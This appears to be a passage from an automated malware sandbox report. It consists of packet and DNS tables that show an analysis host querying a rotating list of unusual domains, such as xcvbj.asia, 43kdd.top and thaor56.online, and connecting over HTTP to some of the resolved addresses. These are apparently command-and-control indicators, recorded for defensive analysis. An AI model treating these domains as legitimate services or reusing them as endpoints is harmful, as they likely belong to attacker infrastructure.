                                                                                                                                                                              Jan 11, 2025 04:02:12.425354958 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:12.730308056 CET8049853154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:12.730467081 CET8049853154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:12.730647087 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:13.935868025 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:14.946826935 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.251804113 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.252096891 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.255738974 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.255806923 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.560668945 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.560858965 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561069965 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561315060 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561505079 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561789989 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:16.760514975 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:17.768416882 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.073002100 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:18.073185921 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.075582981 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.380187035 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:18.380424023 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:18.380677938 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.381326914 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.685905933 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:23.391118050 CET4985680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:23.532685995 CET8049856208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:23.532902002 CET4985680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:23.536418915 CET4985680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:23.678112030 CET8049856208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:26.058243990 CET4985780192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:26.199707031 CET8049857208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:26.199907064 CET4985780192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:26.203465939 CET4985780192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:26.344985962 CET8049857208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:28.729798079 CET4985880192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:28.871468067 CET8049858208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:28.871591091 CET4985880192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:28.875220060 CET4985880192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:28.875273943 CET4985880192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:28.875319958 CET4985880192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:29.016987085 CET8049858208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:31.405320883 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:31.546825886 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:31.547161102 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:31.549511909 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:31.697007895 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.209933996 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.209969997 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.209992886 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.210109949 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.210113049 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.210180044 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.210303068 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.210467100 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.210467100 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.210474014 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.210515976 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.210690022 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.332572937 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358004093 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358047962 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358160973 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358191013 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.358280897 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358381987 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.358452082 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358567953 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358658075 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.358697891 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.358839035 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.505757093 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.505882025 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.506057978 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.506097078 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.506114960 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.506258011 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.506393909 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.506453037 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.506506920 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.506645918 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.506776094 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.506933928 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.653731108 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.653821945 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.654000044 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.654771090 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655014992 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655113935 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655225992 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655349016 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655457020 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655580997 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655642986 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.655642986 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.655649900 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.655807972 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.655973911 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.801414013 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.801506996 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.801732063 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.802994013 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.803082943 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.803313017 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.803833961 CET8049859208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:32.804133892 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.804945946 CET4985980192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:32.946275949 CET8049859208.91.197.39192.168.11.20

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Jan 11, 2025 03:54:03.036056995 CET5994753192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 03:54:03.662023067 CET53599471.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:38.984795094 CET4926553192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 03:54:39.992573023 CET4926553192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:54:40.112169027 CET53492659.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:40.112214088 CET53492651.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:45.117283106 CET5113953192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:54:45.282531977 CET53511399.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:00.614151955 CET5879553192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:55:00.819432020 CET53587959.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:14.283555984 CET5108853192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:55:14.722742081 CET53510889.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:28.826633930 CET6429453192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:55:29.164550066 CET53642949.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:42.886065006 CET6445753192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:55:43.081113100 CET53644579.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:56.554668903 CET5129053192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:55:56.673897028 CET53512909.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:04.724915981 CET5104853192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:56:05.195960999 CET53510489.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:19.346888065 CET5228853192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:56:19.742466927 CET53522889.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:33.859136105 CET5404953192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:56:34.034398079 CET53540499.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:48.653014898 CET5052553192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:56:48.826095104 CET53505259.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:03.149560928 CET5605753192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:57:03.275743961 CET53560579.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:57:55.200788021 CET5486953192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:57:55.342592001 CET53548699.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:08.916413069 CET6124453192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:58:09.173382044 CET53612449.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:22.632127047 CET5530953192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:58:23.093983889 CET53553099.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:36.957201004 CET6205253192.168.11.209.9.9.9
                                                                                                                                                                              Jan 11, 2025 03:58:37.971703053 CET6205253192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 03:58:38.300463915 CET53620521.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.630945921 CET53620529.9.9.9192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:58.697755098 CET4926453192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 03:58:59.649151087 CET53492641.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:37.774869919 CET53601641.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:37.795315981 CET53576931.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:37.798178911 CET53631531.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:37.828464985 CET53509781.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:37.942929983 CET53595401.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:37.999188900 CET6548853192.168.11.208.8.8.8
                                                                                                                                                                              Jan 11, 2025 03:59:37.999346018 CET5538953192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 03:59:38.120697021 CET53553891.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:38.129187107 CET53654888.8.8.8192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:38.716106892 CET53554701.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:39.151216984 CET53531631.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:39.152082920 CET53600721.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:39.630193949 CET53627691.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:42.400355101 CET5719353192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 03:59:42.400451899 CET6102353192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 03:59:42.519467115 CET53610231.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:42.519481897 CET53571931.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:44.280523062 CET53577701.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:44.304033995 CET53635871.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:44.424940109 CET53627541.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:57.771157980 CET53524391.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:59.644996881 CET53596921.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:07.480071068 CET53624871.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.586045980 CET53565841.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.590399981 CET53589531.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.734544039 CET53648601.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:21.644046068 CET53635521.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:22.441298008 CET5365553192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 04:00:22.964394093 CET53536551.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:37.813393116 CET53540181.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:39.675417900 CET5050153192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 04:00:40.206815958 CET53505011.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:47.191014051 CET53574611.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:55.212167025 CET5739253192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 04:00:55.754957914 CET53573921.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:14.897722006 CET53633981.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:14.902178049 CET53508911.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:15.044693947 CET53650991.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:20.700360060 CET53594911.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:38.861677885 CET53595991.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:07.407421112 CET53554531.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.117172956 CET53511381.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:27.303982973 CET53580621.1.1.1192.168.11.20

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Jan 11, 2025 03:54:03.036056995 CET192.168.11.201.1.1.10xdeeStandard query (0)babalharra.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:38.984795094 CET192.168.11.201.1.1.10xabb4Standard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:39.992573023 CET192.168.11.209.9.9.90xabb4Standard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:45.117283106 CET192.168.11.209.9.9.90x44aaStandard query (0)www.optimismbank.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:00.614151955 CET192.168.11.209.9.9.90x1182Standard query (0)www.greenthub.lifeA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:14.283555984 CET192.168.11.209.9.9.90xdfc1Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:28.826633930 CET192.168.11.209.9.9.90x174eStandard query (0)www.bankseedz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:42.886065006 CET192.168.11.209.9.9.90xf3a3Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:56.554668903 CET192.168.11.209.9.9.90xa61Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:04.724915981 CET192.168.11.209.9.9.90x9132Standard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:19.346888065 CET192.168.11.209.9.9.90xbfa6Standard query (0)www.43kdd.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:33.859136105 CET192.168.11.209.9.9.90x56fcStandard query (0)www.jcsa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:48.653014898 CET192.168.11.209.9.9.90x25f8Standard query (0)www.1secondlending.oneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:57:03.149560928 CET192.168.11.209.9.9.90x3d18Standard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:57:55.200788021 CET192.168.11.209.9.9.90xcc2aStandard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:08.916413069 CET192.168.11.209.9.9.90x49a5Standard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:22.632127047 CET192.168.11.209.9.9.90x1c82Standard query (0)www.aballanet.catA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:36.957201004 CET192.168.11.209.9.9.90x8218Standard query (0)www.remedies.proA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:37.971703053 CET192.168.11.201.1.1.10x8218Standard query (0)www.remedies.proA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:58.697755098 CET192.168.11.201.1.1.10xe023Standard query (0)www.thaor56.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:37.999188900 CET192.168.11.208.8.8.80xc905Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:37.999346018 CET192.168.11.201.1.1.10xd4c1Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:42.400355101 CET192.168.11.201.1.1.10x2ff4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:59:42.400451899 CET192.168.11.201.1.1.10xca0eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:22.441298008 CET192.168.11.201.1.1.10x5c89Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:39.675417900 CET192.168.11.201.1.1.10x8d67Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 04:00:55.212167025 CET192.168.11.201.1.1.10x7deeStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Jan 11, 2025 03:54:03.662023067 CET1.1.1.1192.168.11.200xdeeNo error (0)babalharra.com.au122.201.127.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:40.112169027 CET9.9.9.9192.168.11.200xabb4Name error (3)www.thaor56.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:40.112214088 CET1.1.1.1192.168.11.200xabb4No error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:40.112214088 CET1.1.1.1192.168.11.200xabb4No error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:45.282531977 CET9.9.9.9192.168.11.200x44aaNo error (0)www.optimismbank.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:54:45.282531977 CET9.9.9.9192.168.11.200x44aaNo error (0)www.optimismbank.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:00.819432020 CET9.9.9.9192.168.11.200x1182No error (0)www.greenthub.life209.74.77.109A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:14.722742081 CET9.9.9.9192.168.11.200xdfc1No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:14.722742081 CET9.9.9.9192.168.11.200xdfc1No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:14.722742081 CET9.9.9.9192.168.11.200xdfc1No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:14.722742081 CET9.9.9.9192.168.11.200xdfc1No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:14.722742081 CET9.9.9.9192.168.11.200xdfc1No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:29.164550066 CET9.9.9.9192.168.11.200x174eNo error (0)www.bankseedz.info46.30.211.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:43.081113100 CET9.9.9.9192.168.11.200xf3a3No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:55:56.673897028 CET9.9.9.9192.168.11.200xa61Name error (3)www.xcvbj.asianonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:05.195960999 CET9.9.9.9192.168.11.200x9132No error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:19.742466927 CET9.9.9.9192.168.11.200xbfa6No error (0)www.43kdd.top43kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:19.742466927 CET9.9.9.9192.168.11.200xbfa6No error (0)43kdd.top154.23.178.231A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:34.034398079 CET9.9.9.9192.168.11.200x56fcNo error (0)www.jcsa.info208.91.197.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:56:48.826095104 CET9.9.9.9192.168.11.200x25f8No error (0)www.1secondlending.one43.205.198.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:57:03.275743961 CET9.9.9.9192.168.11.200x3d18No error (0)www.zkdamdjj.shop104.21.40.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:57:03.275743961 CET9.9.9.9192.168.11.200x3d18No error (0)www.zkdamdjj.shop172.67.187.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:57:55.342592001 CET9.9.9.9192.168.11.200xcc2aNo error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:57:55.342592001 CET9.9.9.9192.168.11.200xcc2aNo error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:09.173382044 CET9.9.9.9192.168.11.200x49a5No error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:09.173382044 CET9.9.9.9192.168.11.200x49a5No error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:23.093983889 CET9.9.9.9192.168.11.200x1c82No error (0)www.aballanet.cataballanet.catCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:23.093983889 CET9.9.9.9192.168.11.200x1c82No error (0)aballanet.cat134.0.14.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:38.300463915 CET1.1.1.1192.168.11.200x8218No error (0)www.remedies.pro13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:38.300463915 CET1.1.1.1192.168.11.200x8218No error (0)www.remedies.pro76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:38.630945921 CET9.9.9.9192.168.11.200x8218No error (0)www.remedies.pro52.20.84.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 11, 2025 03:58:59.649151087 CET1.1.1.1192.168.11.200xe023No error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
